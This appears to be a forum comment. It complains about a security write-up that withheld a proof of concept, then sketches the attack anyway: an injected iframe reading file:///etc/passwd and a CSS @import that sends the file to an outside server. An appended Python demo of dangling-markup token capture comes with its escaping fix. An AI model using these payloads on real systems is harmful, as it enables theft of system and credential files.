
> I will not leave a PoC for this chapter but I promise you, it will not be that difficult to figure out after reading the above two parts

I find this kind of annoying. Either write about the vulnerability or don't.



So... First vulnerability is that you can force someone to hit

2nd vulnerability is that you can print a password file (or other file) inside the text editor

<iframedoc src="file:///etc/passwd">

A dangling markup attack is an attack that sends you information as part of the url request up to the next quote

So you could do this and someone has sent you the contents of the password file when trying to get css

<style>@import{ "file:///net/MYSERVER.COM/stealpassword.css?=<iframedoc src="file:///etc/passwd">"} </style>


Which is very interesting in and of itself as that's not how dangling markup attacks usually work (normally it would send the unparsed html, not the result of parsing the html). Not to mention wtf the non-standard <iframedoc> tag is and how it differs from an iframe.

But my broader point was less the how, and more that the style of writing was obnoxious.
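For readers who want to see the point about "unparsed html" made concrete: the following is an added example, not code from the thread or from the book being discussed. It builds a constructed page in which untrusted text lands in a template next to a hidden token, shows that an injected element with an unterminated single-quoted src attribute swallows the raw page source (including the token) up to the next single quote, and shows that escaping the untrusted value for HTML context removes the problem. The collector host, the template and the token value are all made up for the demo.

```python
import html
from html.parser import HTMLParser

# Constructed page: an untrusted "name" is interpolated, a secret lives in a
# later attribute, and a later single quote (in href) will terminate the capture.
TEMPLATE = (
    "<p>Hello {name}</p>"
    '<input type="hidden" name="csrf" value="SECRET-TOKEN-123">'
    "<a href='/logout'>Log out</a>"
)

# Constructed untrusted input: opens an element whose src attribute is never
# closed on the same tag. collector.example is a hypothetical host.
INJECTED = "<img src='https://collector.example/?"


def render_unsafe(name: str) -> str:
    """The 'before' case: untrusted text dropped into HTML as-is."""
    return TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """The fix: escape <, >, &, and both quote styles for the HTML context."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


class SrcCollector(HTMLParser):
    """Records every src attribute value the parser actually sees."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: list = []

    def handle_starttag(self, tag, attrs) -> None:
        for key, value in attrs:
            if key == "src" and value is not None:
                self.srcs.append(value)


def fetched_sources(markup: str) -> list:
    """Return the URLs a parser would try to fetch for src attributes in markup."""
    parser = SrcCollector()
    parser.feed(markup)
    parser.close()
    return parser.srcs


if __name__ == "__main__":
    print(fetched_sources(render_unsafe(INJECTED)))  # raw source, token included
    print(fetched_sources(render_safe(INJECTED)))    # []
```

Chromium additionally refuses to fetch resource URLs that contain both a raw newline and a `<`, which blocks many of these captures on real multi-line pages, but that is a browser-side backstop; escaping at the template layer is the dependable fix.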



